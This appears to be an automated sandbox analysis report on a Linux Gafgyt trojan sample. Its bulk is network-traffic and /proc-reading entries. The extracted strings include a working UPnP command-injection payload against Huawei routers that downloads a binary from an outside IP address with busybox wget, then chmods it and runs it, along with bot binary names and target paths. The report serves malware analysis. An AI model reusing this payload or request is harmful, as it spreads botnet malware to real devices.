            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
            Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39120 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41930
            Source: unknownNetwork traffic detected: HTTP traffic on port 33152 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55660 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41926

            System Summary

            barindex
            Source: 3wN5NfZaD8.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5487.1.00007f8874001000.00007f8874025000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: 3wN5NfZaD8.elf PID: 5487, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-servershellsys/boot/media/srv/var/run/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashbot.armbot.arm5bot.arm6bot.arm7bot.mipsbot.mpslbot.x86bot.x86_64bot.ppcbot.sh4bot.m68kskyljne.x86skyljne.ppcboskyljnet.m68ktelnetddropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//data/local/tmp//opt//lib/systemd//usr/lib/systemd/system/system/bin//gm/bin//mnt//home/process//home/helper/home/davinci/z/bin//mnt/mtd//tmp/sqfs//usr/libexec//usr/sbin//z/zbin//usr/bin/usr/lib/openssh/sftp-server/home/POST /goform/set_LimitClient_cfg HTTP/1.1
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: 3wN5NfZaD8.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5487.1.00007f8874001000.00007f8874025000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: 3wN5NfZaD8.elf PID: 5487, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal100.troj.linELF@0/1025@19/0
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/1583/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/2672/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/1577/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/917/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/19/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/1593/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/240/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/3094/cmdlineJump to behavior
            Source: /tmp/3wN5NfZaD8.elf (PID: 5492)File opened: /proc/121/cmdlineJump to behavior
